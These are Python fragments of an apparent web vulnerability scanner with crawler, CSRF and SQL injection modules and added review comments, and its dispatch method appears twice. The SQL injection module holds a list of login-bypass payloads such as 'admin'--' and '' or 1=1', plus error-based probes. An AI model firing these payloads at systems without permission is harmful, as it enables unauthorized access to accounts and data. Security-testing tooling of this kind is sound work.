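def __init__(self, process, root):
    """Seed both URL lists with *root* and flag the process as crawling.

    Args:
        process: Process identifier forwarded to
            ``DBAdapter.update_process``.
        root: Starting URL; it is stored in ``self.queue`` and in
            ``self.final_list``.

    Raises:
        Whatever ``DBAdapter`` raises; the connection is still closed.
    """
    # Both lists start with the root URL only.
    self.queue = URLlist()
    self.queue.put_url(root)
    self.final_list = URLlist()
    self.final_list.put_url(root)

    db = DBAdapter()
    try:
        db.update_process(process, 2)  # Status: 2, crawling.
    finally:
        # Release the connection even if the status update fails, so a
        # failed constructor does not leave a DB handle open.
        db.close_connection()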
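def __save_results(self, web, v_type):
    """Persist a finding and forward it to the reporting API.

    The finding is written to the database first and then POSTed as JSON
    to ``api``.

    Args:
        web: Object exposing ``get_url()``; that URL is stored and sent.
        v_type: Numeric finding type. ``1`` is reported as
            "Authentication attempt", ``2`` as "Error based SQL
            injection", and any other value as "SQL injection".

    Raises:
        Whatever ``DBAdapter`` or ``requests.post`` raise; nothing is
        caught here. With the timeout below, an unresponsive API now
        raises instead of blocking forever.
    """
    target = web.get_url()

    db = DBAdapter()
    try:
        db.vulnerability_found(self.process, target, v_type)
    finally:
        # Close the connection even when the insert fails.
        db.close_connection()

    if v_type == 1:
        label = "Authentication attempt"
    elif v_type == 2:
        label = "Error based SQL injection"
    else:
        label = "SQL injection"

    data = {
        "PROCESS": self.process,
        "WEB": target,
        "VULNERABILITY": label,
        "USER": self.user
    }
    # requests has no default timeout, so an unresponsive API would stall
    # the whole scan. 10 s is a default chosen for this fix; tune it to
    # the deployment.
    # NOTE(review): `api` is defined outside this block. The payload names
    # the user and the affected URL, so confirm the endpoint is HTTPS and
    # authenticated. The HTTP status of the reply is not inspected.
    requests.post(api, json=data, timeout=10)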
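def __init__(self, url_list, process, user):
    """Store the scan context and flag the process as CSRF search.

    Args:
        url_list: URL collection to work on; ``None`` is replaced by a
            fresh empty ``URLlist``.
        process: Process identifier forwarded to
            ``DBAdapter.update_process``.
        user: Stored on the instance as ``self.user``.

    Raises:
        Whatever ``DBAdapter`` raises; the connection is still closed.
    """
    self.process = process
    self.user = user
    self.url_list = URLlist() if url_list is None else url_list

    db = DBAdapter()
    try:
        db.update_process(process, 4)  # Status: 4, csrf search.
    finally:
        # Do not leave the connection open if the status update fails.
        db.close_connection()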
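def __save_results(self, web, v_type):
    """Persist a CSRF finding and forward it to the reporting API.

    Args:
        web: Object exposing ``get_url()``; that URL is stored and sent.
        v_type: Numeric finding type passed to
            ``DBAdapter.vulnerability_found``. The API payload always
            reports "CSRF" regardless of this value.

    Raises:
        Whatever ``DBAdapter`` or ``requests.post`` raise; nothing is
        caught here. With the timeout below, an unresponsive API now
        raises instead of blocking forever.
    """
    target = web.get_url()

    db = DBAdapter()
    try:
        db.vulnerability_found(self.process, target, v_type)
    finally:
        # Close the connection even when the insert fails.
        db.close_connection()

    data = {
        "PROCESS": self.process,
        "WEB": target,
        "VULNERABILITY": "CSRF",
        "USER": self.user
    }
    # requests has no default timeout, so an unresponsive API would stall
    # the whole scan. 10 s is a default chosen for this fix; tune it to
    # the deployment.
    # NOTE(review): `api` is defined outside this block. The payload names
    # the user and the affected URL, so confirm the endpoint is HTTPS and
    # authenticated. The HTTP status of the reply is not inspected.
    requests.post(api, json=data, timeout=10)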
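def __init__(self, url_list, process, user):
    """Store the scan context, flag the process as SQL injection search,
    and load the probe strings and error signatures used by this module.

    Args:
        url_list: URL collection to work on; ``None`` is replaced by a
            fresh empty ``URLlist``.
        process: Process identifier forwarded to
            ``DBAdapter.update_process``.
        user: Stored on the instance as ``self.user``.

    Raises:
        Whatever ``DBAdapter`` raises; the connection is still closed.
    """
    self.process = process
    self.user = user
    self.url_list = URLlist() if url_list is None else url_list

    db = DBAdapter()
    try:
        db.update_process(process, 3)  # Status: 3, SQL injection search.
    finally:
        # Do not leave the connection open if the status update fails.
        db.close_connection()

    # http://stackoverflow.com/questions/9626535/get-domain-name-from-url
    # self.domain = "{0.scheme}://{0.netloc}/".format(urllib.parse.urlsplit(url))

    # Login-form probe strings, in single- and double-quote variants.
    # Source: http://www.hacoder.com/2015/10/sql-injection-authentication-bypass-cheat-sheet/
    self.input_data = [
        'admin\'--',
        '\' or 1=1',
        ' or 1=1',
        'or 1=1--',
        'or 1=1#',
        'or 1=1/*',
        'admin\' #',
        'admin\'/*',
        'admin\' or \'1\'=\'1',
        'admin\' or \'1\'=\'1\'--',
        'admin\' or \'1\'=\'1\'#',
        'admin\' or \'1\'=\'1\'/*',
        'admin\'or 1=1 or \'\'=\'',
        'admin\' or 1=1',
        'admin\' or 1=1--',
        'admin\' or 1=1#',
        'admin\' or 1=1/*',
        'admin\') or (\'1\'=\'1',
        'admin\') or (\'1\'=\'1\'--',
        'admin\') or (\'1\'=\'1\'#',
        'admin\') or (\'1\'=\'1\'/*',
        'admin\') or \'1\'=\'1',
        'admin\') or \'1\'=\'1\'--',
        'admin\') or \'1\'=\'1\'#',
        'admin\') or \'1\'=\'1\'/*',
        'admin" --',
        'admin" #',
        'admin"/*',
        'admin" or "1"="1',
        'admin" or "1"="1"--',
        'admin" or "1"="1"#',
        'admin" or "1"="1"/*',
        'admin"or 1=1 or ""="',
        'admin" or 1=1',
        'admin" or 1=1--',
        'admin" or 1=1#',
        'admin" or 1=1/*',
        'admin") or ("1"="1',
        'admin") or ("1"="1"--',
        'admin") or ("1"="1"#',
        'admin") or ("1"="1"/*',
        'admin") or "1"="1',
        'admin") or "1"="1"--',
        'admin") or "1"="1"#',
        'admin") or "1"="1"/*'
    ]

    # Parameter probes for the error-based check: a lone quote plus a
    # 1=1 / 1=2 pair.
    self.error_based_sqli_param_data = [
        '\'',
        'A%\' and 1=1--',
        'A%\' and 1=2--'
    ]
    # self.serialized_param_data = []

    # One error signature per DBMS, from
    # https://www.owasp.org/images/5/52/OWASP_Testing_Guide_v4.pdf, page 111.
    # NOTE(review): every signature is lower-case, so the comparison
    # presumably runs against a lower-cased response body; confirm at the
    # use site. With a single message per engine, a target that customises
    # or suppresses its error pages will not match, so a clean result is
    # not evidence that no injection exists.
    self.sql_errors = {
        'MySQL': 'you have an error in your sql syntax',
        'MSSQL': 'microsoft sql native client error',
        'Oracle': 'ora-00933: sql command not properly ended',
        'PostgreSQL': 'query failed: error: syntax error at or near'
    }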
def start(self, call):
    """Dispatch an API call: run the configured scan modules, or report
    the status of the user's current process.

    Args:
        call: Passed to ``self.__check_call``; a result of 1 selects the
            scan branch, 2 the status branch.

    Returns:
        ``{"response": False}`` when the call is neither 1 nor 2, when
        ``new_process`` returns 0, or when no current process exists.
        A dict with ``web``/``date``/``stype``/``status`` for a status
        call. ``True`` in every other case.
    """
    # NOTE(review): the nesting below was reconstructed from a flattened
    # listing. The placement of the "finished" update (after the loop) and
    # of `else: continue` is inferred; confirm against the original file.
    c = self.__check_call(call)
    if c == 1:  # Search option.
        # NOTE(review): __is_valid_url() is the only gate on self.url that
        # is visible here. Any scope or ownership restriction on scan
        # targets has to live there or in the caller.
        # NOTE(review): as laid out here, a False result skips the whole
        # scan and still falls through to `return True`. Confirm callers
        # can tell that case from a completed scan.
        if self.__is_valid_url():
            self.__check_modules()
            url_list = URLlist()
            db = DBAdapter()
            process = db.new_process(self.url, self.user, 1, 1)  # Status: 1, processing.
            db.close_connection()
            if process == 0:  # The user has a search going on.
                return {"response": False}
            url_list.put_url(self.url)
            for action in self.actions:  # Going through the required modules by the API.
                if action[ 'module']:  # Looking if the required module is active.
                    # Modules are imported on demand; each import rebinds
                    # the local name `main`.
                    if action['number'] == 1:
                        from backend.modules.crawler.module import main
                        # The crawler's return value replaces url_list for
                        # the modules that run after it.
                        url_list = main(process, self.url)
                    else:
                        if action['number'] == 2:
                            from backend.modules.sqlinjection.module import main
                            main(url_list, process, self.user)
                        elif action['number'] == 3:
                            from backend.modules.csrf.module import main
                            main(url_list, process, self.user)
                else:
                    continue
            # NOTE(review): reached only if no module raised. An exception
            # above presumably leaves the process unfinished, and
            # new_process may then keep returning 0 for this user; confirm.
            db = DBAdapter()
            db.update_process(process, 5)  # Status: 5, finished.
            db.close_connection()
    elif c == 2:  # Get status option.
        db = DBAdapter()
        process = db.get_current_process_status(self.user)
        db.close_connection()
        if process is None:
            return {"response": False}
        # The row is read positionally: 0 -> stype, 1 -> web, 2 -> date,
        # 3 -> status.
        data = {
            "web": process[1],
            "date": process[2],
            "stype": process[0],
            "status": process[3]
        }
        return data
    else:  # Wrong call.
        return {"response": False}
    return True  # If we get here, everything was right.
def start(self, call):
    """Dispatch an API call: run the configured scan modules, or report
    the status of the user's current process.

    Args:
        call: Passed to ``self.__check_call``; a result of 1 selects the
            scan branch, 2 the status branch.

    Returns:
        ``{"response": False}`` when the call is neither 1 nor 2, when
        ``new_process`` returns 0, or when no current process exists.
        A dict with ``web``/``date``/``stype``/``status`` for a status
        call. ``True`` in every other case.
    """
    # NOTE(review): the nesting below was reconstructed from a flattened
    # listing. The placement of the "finished" update (after the loop) and
    # of `else: continue` is inferred; confirm against the original file.
    c = self.__check_call(call)
    if c == 1:  # Search option.
        # NOTE(review): __is_valid_url() is the only gate on self.url that
        # is visible here. Any scope or ownership restriction on scan
        # targets has to live there or in the caller.
        # NOTE(review): as laid out here, a False result skips the whole
        # scan and still falls through to `return True`. Confirm callers
        # can tell that case from a completed scan.
        if self.__is_valid_url():
            self.__check_modules()
            url_list = URLlist()
            db = DBAdapter()
            process = db.new_process(self.url, self.user, 1, 1)  # Status: 1, processing.
            db.close_connection()
            if process == 0:  # The user has a search going on.
                return {"response": False}
            url_list.put_url(self.url)
            for action in self.actions:  # Going through the required modules by the API.
                if action['module']:  # Looking if the required module is active.
                    # Modules are imported on demand; each import rebinds
                    # the local name `main`.
                    if action['number'] == 1:
                        from backend.modules.crawler.module import main
                        # The crawler's return value replaces url_list for
                        # the modules that run after it.
                        url_list = main(process, self.url)
                    else:
                        if action['number'] == 2:
                            from backend.modules.sqlinjection.module import main
                            main(url_list, process, self.user)
                        elif action['number'] == 3:
                            from backend.modules.csrf.module import main
                            main(url_list, process, self.user)
                else:
                    continue
            # NOTE(review): reached only if no module raised. An exception
            # above presumably leaves the process unfinished, and
            # new_process may then keep returning 0 for this user; confirm.
            db = DBAdapter()
            db.update_process(process, 5)  # Status: 5, finished.
            db.close_connection()
    elif c == 2:  # Get status option.
        db = DBAdapter()
        process = db.get_current_process_status(self.user)
        db.close_connection()
        if process is None:
            return {"response": False}
        # The row is read positionally: 0 -> stype, 1 -> web, 2 -> date,
        # 3 -> status.
        data = {
            "web": process[1],
            "date": process[2],
            "stype": process[0],
            "status": process[3]
        }
        return data
    else:  # Wrong call.
        return {"response": False}
    return True  # If we get here, everything was right.